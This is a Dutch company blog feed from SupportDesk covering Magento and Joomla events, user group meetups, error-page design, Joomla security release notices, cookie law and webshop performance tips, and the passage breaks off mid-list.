    SupportDesk is verhuisd

     

    We zijn verhuisd per 1 maart en superblij met onze nieuwe locatie. Met uitzicht op het IJ en op ongeveer 10 minuten van het Amsterdam Centraal Station kun je ons vinden op De Ruijterkade nummer 139. Meer informatie vind je op onze SupportDesk bedrijfsgegevens pagina.

    Bezoekadres Magento en Joomla! trainingen

    De Magento en Joomla! trainingen verzorgd door Ray Bogman vinden plaats op dit nieuwe adres, De Ruijterkade 139, 1011 AC te Amsterdam.

    Bezoekadres Magento User Groups

    De Magento User Groups van het Magento Competence Center blijven vooralsnog op de Rokin 52, 1012 KV te Amsterdam.

    De eerstvolgende Magento User Group is op 26 maart, en zal gaan over: Magento 2.0 & Magento Snowcamp recap. Ben erbij en schrijf je Inschrijven Magento 2.0 & Magento Snowcamp recap in.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Joomla!dagen 2013

    Joomla!Dagen op zaterdag 20 en zondag 21 april 2013

    Joomla!Dagen op zaterdag 20 en zondag 21 april 2013 in Zeist

    Vele interessante onderwerpen zullen tijdens de Joomla!Dagen op zaterdag 20 en zondag 21 april 2013 aan bod komen. Het is een waar festijn voor de Joomla! liefhebbers onder ons. De onderwerpen variëren van: 'Is Joomla! ook in 2017 nog de juiste keus?', 'Online Persuasion', 'Joomla 2 vs Joomla 3', 'Site gehacked... hoe op te lossen?', 'Joomla Mobile website optimalisatie - The Responsive Mythes', en nog veel en veel meer.

    Voor beginners en developers!

    Begin je net met Joomla, of heb je al jarenlange ervaring en ben je toe aan de volgende stap? Het programma bevat voor zowel beginnende Joomla gebruikers als developers interessante presentaties. Een overzicht van de presentaties per niveau vind je op de Niveaus pagina.

    Korting op entree tickets

    Tot 20 maart bestel je een dagticket voor 55 euro in plaats van 75 euro, en een combinatieticket voor 95 euro in plaats van 125 euro. Wees er snel bij, sowieso voor de korting, maar ook omdat het snel gaat met de kaartverkoop. Het ziet er naar uit dat ze ook dit jaar weer uitverkocht raken. Bestel hier Joomla!Dagen tickets.

    Locatie

    Woudschoten Hotel & Conferentiecentrum in Zeist
    Woudenbergseweg 54
    3707 HX Zeist

    Joomla Mobile website optimalisatie - The Responsive Mythes

    responsivemythesMet de komst van Responsive Webdesign denken we het "gouden ei" gevonden te hebben, maar dit is niet zo. In deze presentatie zal Ray Bogman de Mythes van Responsive Webdesign aangeven en je op weg helpen waar je op moet letten bij het bouwen van een mobile website voor Joomla!

    Lees meer over de Joomla Mobile website optimalisatie - The Responsive Mythes presentatie.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Magento Cluster hosting voor TV commercial

    branchecontactDinsdag 12 maart a.s. zal Ray Bogman tijdens de E-commerce & Apps event, georganiseerd door Branchecontact, een presentatie verzorgen over een recente klant case van SupportDesk.

    Toegangskaarten zijn gratis te verkrijgen via de website, hierbij de link.

    Magento Cluster hosting voor TV commercial

    Groeit je Magento website zo snel of ben je aan het overwegen om een reclamespot op de commerciële zenders te launchen? Onze klant Condoom-Anoniem kreeg een aanbod om het programma Zon Zee Zuipen op RTL5 te sponsoren door middel van een opening/closing leader en een product spot in diverse afleveringen. Wat betekent dit nu voor je website? Kan deze het aantal bezoekers aan? Kortom, wat komt hier allemaal bij kijken en wat moet je vooral wel en niet doen om dit tot een sucses te brengen.
    De toegang voor deze seminar is gratis!

    Verder op het programma.

    Meet and Greet

    Voor aanvang van de presentatie en na afloop is het mogelijk om ons op de stand van SupportDesk te ontmoeten met eventuele vragen over Magento of Joomla! support. Je kan ons herkennen aan deze banner:

    Ecommerce & Apps SupportDesk

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento 2.0 & Magento Snowcamp recap

    Magento User Group

    De eerstvolgende Magento User Group zal gaan over Magento 2.0 en er gaat gesproken worden over de Magento Developers Paradise - Snowcamp editie.

    Magento 2.0

    Hoewel de release van Magento 2.0 al lange tijd op zich laat wachten, bestaat er nog steeds veel opwinding over de komst van de nieuwe versie. De verwachting is dat de release zal gaan plaatsvinden in het voorjaar van 2013.

    Magento 2.0

    Magento 2.0 zal niet alleen nieuwe functies bevatten, zoals de Visual Design Editor (een ''drag & drop'' systeem), maar zal ook het raamwerk waarop het systeem draait, ingrijpend veranderen. Wat zijn de al bekende belangrijkste features en functionaliteiten? Tijdens deze MUG zullen we deze bespreken.

    Magento Developers Paradise - Snowcamp editie

    Een additioneel event van het jaarlijkse Magento Developers Paradise genaamd Snowcamp zal plaatsvinden op 19 tot 22 maart te Oostenrijk.

    Voormalig CTO van Magento, Yoav Kutner zal zeer waarschijnlijk ook aanwezig zijn tijdens deze Magento Snowcamp en wij hopen hem te strikken voor een video interview die we tijdens deze MUG zullen vertonen. Ook zullen de belangrijkste ins en outs van het Snowcamp bij deze MUG aanbod komen.

    snowcamp

    Dus kom naar de MUG en blijf up-to-date wat betreft de ontwikkelingen van Magento 2.0 en de nieuwtjes uitgebracht op Magento Developers Paradise.

    Waar kan ik me inschrijven?

    Ga naar deze Magento Competence Center pagina en schrijf je in voor de volgende mug. Kom naar deze Magento User Group en discussiëer mee. Krijg tips en tricks van andere aanwezigen.

    Wij zien je met veel plezier in de Magento Competence Center te Amsterdam.

    Ben je nog niet zeker of de Magento User Group iets voor jou is en wil je hier meer over weten lees dan dit blog. Daar lees je over voor wie de MUG is bedoeld en welke onderwerpen er onder meer aan bod komen.

    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Magento error pages

    Magento Error pages In Magento bestaan er twee belangrijke (regelmatig onderschatte) Magento foutmeldingen pagina’s. Namelijk de 404 en de 503 error pagina’s. Het is belangrijk om bij beide foutmeldingen de bezoeker te informeren wat er aan de hand is.

    Vervolgens probeer je de bezoeker te sturen naar het verder zoeken op de site of het laten terugkomen naar de site.

    Wat betekent '503 Service Unavailable'?

    De 503 http-statuscode ‘Dienst niet beschikbaar’ kan komen door een tijdelijke overbelasten of onderhoud van de server.

    De 503 HTTP status voor Magento onderhoud

    Door een specifieke HTTP status voor onderhoud in te stellen, vertelt u de Google indexatie bot dat de website tijdelijk niet beschikbaar is. Voor Magento onderhoud kan de HTTP status 503 (Service tijdelijk niet beschikbaar) gebruikt worden.

    Magento 503 defaultAan de linkerkant zie je hoe de standaard Magento 503 pagina eruit ziet.

    Het kan voorkomen dat je jouw Magento webshop in onderhoudsmodus wilt zetten (als je bijvoorbeeld een upgrade aan het uitvoeren bent via Magento Connect of wanneer je handmatig de maintenance.flag erop zet).

    Lees in deze Magento tutorial ‘Magento in onderhoud: Wat te doen?’ meer over hoe je jouw Magento webshop in onderhoud zet.

    De 503 pagina in je eigen huisstijl

    Nu je weet hoe je jouw Magento website in onderhoud kan zetten, wil je deze natuurlijk ook graag aanpassen zodat het er professioneel uitziet en in dezelfde stijl als je huisstijl. Natuurlijk wil je deze pagina zo min mogelijk online zien, het is immers een error melding en je bezoekers kunnen de website op dat moment niet bezoeken - hierdoor loop je mogelijke verkopen mis.

    Wanneer je de stappen van de tutorial ‘Magento in onderhoud: Wat te doen?’ hebt doorgenomen dan heb je de gedupliceerde map (error/default) een eigen naam gegeven en werkend gekregen. De 503.phtml in deze map kun je gebruiken om eigen html in te zetten. Houdt bij het ontwerpen van deze pagina in gedachten dat er geen enkel Magento onderdeel in voorkomt. Het is namelijk een statische pagina waar je bezoeker op terecht komt en deze laat weten dat de website tijdelijk niet bereikbaar is.

    Magento 503 custom Je kan overigens wel linkjes op deze statische pagina zetten. Zodat je het publiek kunt doorsturen naar bijvoorbeeld je Facebook pagina.

    Aan de rechterkant zie je een voorbeeld hoe een 503 pagina er zo uit kunnen zien, maar dan in je eigen huisstijl.

    Wat betekent '404 Page Not Found'?

    Magento 404 default De Joomla 404 statuscode verschilt niets met de Magento 404 HTTP statuscode. De boodschap en redenen blijven hetzelfde.

    In het blog ‘Joomla 404 pagina maken’ wordt uitgebreid uitgelegd over de 404 HTTP statuscode.

    Aan de linkerkant zie je de standaard Magento 404 pagina.

    De 404 HTTP status voor Magento niet gevonden pagina’s

    Helaas is de Joomla Dynamic404 - Logical error-pages module van Yireo niet beschikbaar voor Magento. Maar er zijn genoeg andere mogelijkheden hoe je dit op een creatieve en daarbij waardevolle manier zou kunnen oppakken in Magento.

    Magento 404 met category listJe kan hierbij specifieke inhoud, zoals een zoekveld, de winkel-sitemap, een contactformulier of winkelcategorieën met producten die in de aanbieding zijn gebruiken.

    Klik op het plaatje aan de rechterkant voor een vergroting van de Magento 404 pagina met category listing.

    Hulp en/of advies nodig?

    Hulp nodig bij het opmaken van een 503 en/of 404 pagina op je Magento webshop. Vul ons contactformulier in om te informeren naar de voorwaarden.

    meer info   of   

    Bel nu! 020 337 5961

     

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Magento User Group: transactionele e-mail + e-mail marketing

    Magento User Group

    De komende maanden zijn er weer een aantal leuke Magento User Groups op de agenda geplaatst, waaronder de eerstvolgende op 26 februari aanstaande.

    Magento User Group: Transactionele e-mail + e-mail marketing

    Transactionele e-mail + e-mail marketing.

    Transactionele e-mail (order- en verzendbevestigingen, creditnota’s, etc.) is een gericht communicatiemiddel naar een klant of bezoeker en wordt vaker geopend en gelezen dan een commerciële e-mail. Hoe stel je deze e-mail op, zodat ook deze e-mailvariant je bedrijf op een professionele manier representeert? Middels diverse live cases (Kika shop en Leapp shop) laten we zien hoe je custom transactionele e-mails kan opzetten met behulp van custom variabelen in de Magento backend. Daarnaast komen er 2 externe sprekers iets vertellen over hun visie op transactionele e-mail marketing.

    Waar kan ik me inschrijven?

    Ga naar deze Magento Competence Center pagina en schrijf je in voor de volgende mug. Kom naar deze Magento User Group en discussiëer hierover mee. Krijg tips en tricks van andere aanwezigen.

    Wij zien je met veel plezier in de Magento Competence Center te Amsterdam.

    Ben je nog niet zeker of de Magento User Group iets voor jou is en wil je hier meer over weten lees dan dit blog. Daar lees je over voor wie de MUG is bedoeld en welke onderwerpen er onder meer aan bod komen.

    meer info   of   

    Bel nu! 020 337 5961

     

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update versie 3.0.3

    security release

    Het Joomla project heeft vandaag een nieuwe Joomla release vrijgegeven, versie 3.0.3. Het betreft hier een Joomla Security release.
    Naast de 3 Joomla Security (low Priority) aanpassingen zijn tevens 136 bug gefixed en 2 nieuwe functionaliteiten.

    Taalpakketen installeren tijdens installatie

    In de nieuwe Joomla 3.0.3 is het vanaf heden mogelijk taalpakketten te installeren tijdens de installatie.

    Meer weten welken issues gefixed zijn, kijk dan op de Joomla 3.0.3 website

    Joomla 3.0.3 taalpakketen installeren tijdens installatie

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Joomla Security Update versie 2.5.9

    security release

    Het Joomla project heeft vandaag een nieuwe Joomla release vrijgegeven, versie 2.5.9. Het betreft hier een Joomla Security release.
    Naast de 1 Joomla Security aanpassingen zijn tevens 22 bug gefixed.

    Meer weten welken issues gefixed zijn, kijk dan op de Joomla 2.5.9 website

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Ontmoet SupportDesk tijdens de Webwinkel Vakdagen 2013

    Zullen we afspreken op de Webwinkel vakdagen?

    De Webwinkel vakdagen is uitgegroeid tot het belangrijkste event van de e-commerce branche in de Benelux. Het event vindt plaats op woensdag 23 en donderdag 24 januari aanstaande, en SupportDesk is er bij!

    Heb je vragen over je Magento webshop en wil je er met een van onze SupportDesk medewerkers over kletsen op een leuke, prettige en informele manier? Graag zien we je dan tijdens de Webwinkel Vakdagen in de Jaarbeurs Utrecht.

    Stuur even een bericht via ons contactformulier om te laten weten dat je langskomt!

    Supportdesk













    meer info   of   

    Bel nu! 020 337 5961

    Sanne PetersDit artikel is geschreven door Sanne Peters, onze junior support gespecialiseerd en spin in het web in Joomla en Magento.

    Google+ | LinkedIn | Twitter

  • Cookiewetgeving oplossing

    Cookiewetgeving

    Wat zijn cookies?

    Er bestaan meerdere soorten cookies (first party, third party, permanent en sessiecookies en http- en flashcookies) met praktisch gezien twee doeleinden, namelijk: technisch noodzakelijke cookies en tracking cookies (ook wel indirecte cookies genoemd). Sommige websites bewaren cookies op je pc, zodat de websites je bij terugkeer herinneren. Dit kan handig zijn, maar het kan ook gebruikt worden om je internetactiviteiten te monitoren.

    Hoe gaan cookies te werk?

    Veel websites plaatsen kleine databestandjes op je pc. Waarin allerlei informatie over je bezoek wordt vastgelegd. Jijzelf hebt hier voordeel van, want als je bij het domein terugkeert dan hoeft je niet opnieuw je gebruikersnaam en wachtwoord te typen. De betreffende webserver maakt namelijk verbinding met het databestandje op je pc, waarna je inloggegevens vanzelf worden ingelezen. Een dergelijk databestandje wordt omschreven als een cookie.
    Online adverteerders gebruiken het bijvoorbeeld om je internetactiviteiten te monitoren. Zij zien onder meer welke websites jij bezoekt. Deze variant wordt een tracking of indirecte cookie genoemd. Om uw privacy te beschermen, is het belangrijk om regelmatig de bestanden op te schonen.

    Artikel 11.7a van de Telecommunicatiewet (in de volksmond "Cookiewet")

    De nieuwe cookiewet is van kracht sinds 5 juni 2012, maar er bestaat nog altijd veel onduidelijkheid. Het komt er op neer dat de cookiewet bepaalt dat elke cookie toestemming nodig heeft, tenzij het valt onder de uitzondering van functionele cookies.

    Deze functionele cookies zijn absoluut noodzakelijk voor het functioneren van de site. Een winkelwagentje of een loginscherm dat cookies gebruikt, valt dus onder deze uitzondering. Een tracking cookie valt dus niet onder de uitzondering - en Google Analytics ook niet. Ook cookies voor je affiliatesites of social media-knoppen vallen gewoon onder de toestemmingsvereiste.

    Waar gaat de eventuele versoepeling van de ‘cookiewet’ over?

    Minister Kamp (Economische Zaken) gaat de cookiewet zo toepassen dat het bijhouden van statistieken zonder toestemming mogelijk is. Websites mogen in deze situatie voor het anoniem verzamelen van gegevens over websitestatistieken zonder expliciete toestemming first party cookies plaatsen en lezen mits de informatie niet met derden gedeeld worden. Lees meer hierover op NU.nl

    Hulp en/of advies nodig?

    Hulp nodig bij het implementeren van een cookie-toestemming op je Joomla website of Magento webshop. Vul ons contactformulier in om te informeren naar de voorwaarden.

    meer info   of   

    Bel nu! 020 337 5961

  • Magento Hosting special in Webdesigner Magazine

    Webdesigner magazine Magento webshopspecialOnlangs is Ray Bogman van SupportDesk gevraagd een redactionele bijdrage te leveren voor een Magento special van de Webdesigner Magazine: Geld verdienen met je webshop.

    Het betreft hier een uitgebreid verhaal over de in-en-outs van Magento hosting. De bijdrage is genaamd: Magento Hosting - een verhaal apart en geeft in 4 pagina's weer wat er allemaal komt kijken bij het hosten van een goede Magento website.

    Webwinkelvakdagen

    Tijdens de webwinkelvakdagen zal deze Magento special uitgedeeld worden onder de bezoekers. Tevens is hij verkrijgbaar in de betere boek- of tijdschriftenhandel.

    Andere onderdelen die in de Webdesigner Magento special aan bod komen:

    • Alle in-en-outs over het opzetten van een Magento webshop
    • Verhoog je conversie met Magento
    • Maak je Magento website mobile ready
    • Otimaliseer de checkout van Magento

     

    meer info   of   

    Bel nu! 020 337 5961

     

    Ray BogmanDit artikel is geschreven door Ray Bogman, mede-oprichter van SupportDesk en heeft zijn rol vervuld als Technisch Directeur.

    Google+ | LinkedIn | Twitter

  • Magento User Group

    Magento User Group

    De Magento User Group is al twee jaar een feit. Jira ICT is met dit initiatief gestart. Deze maandelijke sessies zijn verder uitgebreid in samenwerking met Byte en SupportDesk. Het is uitgegroeid tot een begrip in de Magento wereld. De initiële opzet van het concept MUG was met name het delen van kennis en de mensen erachter samenbrengen. Er zijn inmiddels al vele topics die de revue gepasseerd zijn binnen het Magento veld. Bekijk onze actuele lijst op Magento Competence Center.

    De Magento User Group bijeenkomst is een vrij toegankelijke, maandelijkse ontmoeting te Amsterdam (en binnenkort ook in Tilburg). Het idee er achter is het delen van kennis en Magento weetjes in het gezelschap van Magento specialisten, Magento bouwers maar ook (toekomstige) Magento webshop eigenaren.

    Voor wie is de MUG?Magento User Group

    De MUG is voor de Magento ontwikkelaar, de Magento designer, de Magento marketeer, de (toekomstige) Magento webshop eigenaar. Eigenlijk voor iedereen die open staat om kennis met elkaar te delen en sommige vragen op fora niet kunnen vinden en dat graag in een maandelijkse sessie met elkaar willen oppakken.

    Welke Magento onderwerpen komen aan bod bij zo'n MUG?

    We hebben alleen maar super interessante en praktische onderwerpen die aan bod komen, zoals:

    • Magento Extension Pitch
    • Usability / Eye tracking Workshop
    • Kerstconversie en Usability MUG
    • MageBridge demo middag
    • Magento Seminar - Mobile
    • Magento 2.0 Update and Deployment
    • Valkuilen bij conversieoptimalisatie
    • Magento Multistore & SSL
    • Magento Performance Bootcamp
    • Magento Extensies Musthaves
    • Magento 2.0 + Imagine
    • Seminar Online Persuasion
    • Magento en Debugging en Support
    • Magento en Conversie
    • Magento en de nieuwe cookiewetgeving
    • Social Media & Magento
    • Magento Gebruikers Groep
    • Magento Developers Paradise
    • MeetMagento
    • Magento Seminar - E-fulfilment

    Grijp nu je kans en kom langs op deze MUG eindejaarsknallers:

    20 november 2012, van 19.00-21.30u Magento Extension Pitch

    23 november 2012, van 13.30-17.00u Usability / Eye tracking Workshop

    20 december 2012, van 19.00-21.30u Kerstconversie en Usability MUG

    Usability / Eye tracking Workshop

    Eye Tracking

    Deze mag je echt niet missen: Usability / Eye tracking Workshop, op 23 november te Amsterdam. De Magento User Group (Jira ICT, Byte, Supportdesk) organiseren in samenwerking met Maxxento een workshop over Eye Tracking. Er wordt gestart met wat algemene tekst en uitleg rondom Magento usability en Eye Tracking in het bijzonder. Vervolgens zullen er met de deelnemers een aantal usability tests uitgevoerd worden.

    Met een eye tracker meet je kijkgedrag. De data uit deze kijkgedraganalyse geeft niet alleen aan HOE iemand een website bekijkt, maar ook (zeker niet minder belangrijk) wélke informatie iemand juist NIET ZIET. Deze data is daarmee cruciaal voor het analyseren van knelpunten in websites.

    Schrijf je in voor de workshop op de website van het Magento Competence Center.

  • Magento 1.7 Transactionele e-mails

    Wat zijn Magento Transactionele e-mails?

    magento-transactionalemail

    Transactionele e-mails worden automatisch door Magento naar een klant (met of zonder account) verzonden worden in opvolging van een bestelling, zoals een orderbevestiging, factuur, verzendingsbevestiging of creditnota, maar ook bevestigingen van aangemaakte klantaccounts, nieuwsbrief aan- en afmeldingen, aankondigingen van prijsveranderingen, verlanglijst delen en voorraadstatus-updates. Alles bij elkaar gaat het om zo'n 30 e-mails.

    Dit betekent overigens niet dat elke webshop alle 30 e-mails in gebruik heeft. Dit kun je in het Magento beheergedeelte instellen: System > Configuration. Het configureren en toewijzen van de e-mails zit onder de verschillende opties van de configuratie.

    *Extra informatie: In default en_US Magento installatie (versie 1.7.0.2) telde ik 38 e-mails. Er bestaan een aantal interne admin e-mails, zoals je eigen Magento backend wachtwoord resetten, deze krijgt een klant niet te zien.

    Het grote voordeel van Transactionele e-mails

    Al met al is het een behoorlijke klus om deze e-mails op te maken en goed te beheren, dus waarom de extra tijd en moeite investeren? De transactionele e-mail is een gericht communicatiemiddel naar een klant of bezoeker. Transactionele e-mails zijn geen massale e-mailcampagnes, maar individuele berichten die op een relevant moment worden afgeleverd. Het wordt dan ook vaker geopend en gelezen door de klant dan een commerciële e-mail.

    Transactionele e-mails aanpassen aan je huisstijl

    Nu je weet dat de klant de e-mail daadwerkelijk leest, wil je ook dat deze op een professionele manier je bedrijf representeert. Om te beginnen kun je het logo wijzigen via het backend. Zie deze tutorial: Magento - Transactional emails (Deel 1).

    Wil je kleuren of fonts aanpassen, dan zul je de HTML van elke template afzond erlijk moeten bewerken. Bij een meertalige webshop zul je rekening moeten houden met de verschillen (ontwerp en tekstueel) tussen de verscheidene taalversies van de standaard Magento e-mail templates. Je installeert namelijk een taalpakket met emails, en deze zijn niet op precies dezelfde manier opgebouwd.

    Tip: maak de e-mails Seizoensgebonden

    Als je toch bezig bent met het aanpassen van de e-mails, bedenk dat het ook mogelijk is om een vaste plek in de e-mail te reserveren voor bijvoorbeeld een seizoensgebonden banner. Dit doe je door middel van een variabele aan te maken. Je kunt dan per seizoen het plaatje (met een hyperlink) wijzigen. Hierbij kun je de e-mails voorzien van kortingen of reclames zonder dat het voor de klant als storend beschouwd wordt. Dit kan gedaan worden zonder dat je echt veel html kennis nodig hebt. Op deze manier kun je de e-mails vrij eenvoudig in een sinterklaas, kerst of paas sfeer krijgen.

    Transactionele emails - Seizoensgebonden

    Vraag ons voor een ureninschatting

    Wil je als webeigenaar liever gericht zijn op de verkoop en niet op deze tijdrovende klus, dan kun je SupportDesk vragen voor een ureninschatting. We helpen je graag aan een professioneel Magento transactionele email inrichting en beheer van de e-mail templates.

    meer info   of   

    Bel nu! 020 337 5961

  • Magento kerstvoorbereidingen

    Magento kerstvoorbereidingen

    Is jouw Magento webshop klaar voor de feestdagen?

    Een verhoging van het aantal bezoekers en de conversie kan resulteren in meer verkopen en winstgroei. Maar... is je Magento webshop stabiel genoeg voor deze pieken, de zgn. ‘peak loads’? Doe de SupportDesk Magento APK keuring en controleer of je Magento webshop klaar is voor de feestdagen!

    De Magento feestdagen checklist

    Hieronder zie je 12 tips om het maximale uit de Magento performance te halen tijdens de drukste online winkeldagen van het jaar. Geef je online webwinkeliers de kans om zorgeloos te shoppen op jouw Magento webshop.

    • Maak een backup en 'failover' strategie kenbaar. Weet waarmee, en met wie, je te maken krijgt wanneer het fout dreigt te gaan.
    • Maak een inschatting van je hardware-behoefte en zorg ervoor dat je je database kunt repliceren. Maak een plan voor het geval je additionele hardware moet gaan inzetten om de pieken op te vangen (mn tijdens de feestdagen, zoals eind november/begin december).
    • Test je systeem door het op een gecontroleerde manier te overbelasten. Met deze data weet je waar de grens ligt en kun je - waar nodig - aanpassingen doen (op hardware en/of software gebied).
    • Controleer de timing van de geplande processen. Je wilt er zeker van zijn dat back-end processen, zoals database backups en 'batched import en exports', niet samenvallen met verwachte piekuren.
    • Activeer de Magento cache. Verschillende cache mogelijkheden kunnen via het Admin panel aangezet worden, zoals het cachen van de: configuratie, layouts, blocks output, vertalingen, volledige pagina (deze laatste wordt enkel bij Enterprise editie aangeboden).
    • Maak gebruik van Content Delivery Network (CDN) voor de statische content zoals o.a. afbeeldingen, html pagina's, CSS style sheets en Javascript bestanden (dus niet de content die wordt gecreëerd vanuit scripts en/of databases). Het ontlasten van statische content kan een verhoging van het vermogen om meerdere gebruikers tegelijkertijd te dienen, en de totale respons van de site te verbeteren.
    • Verwijder alle inactiev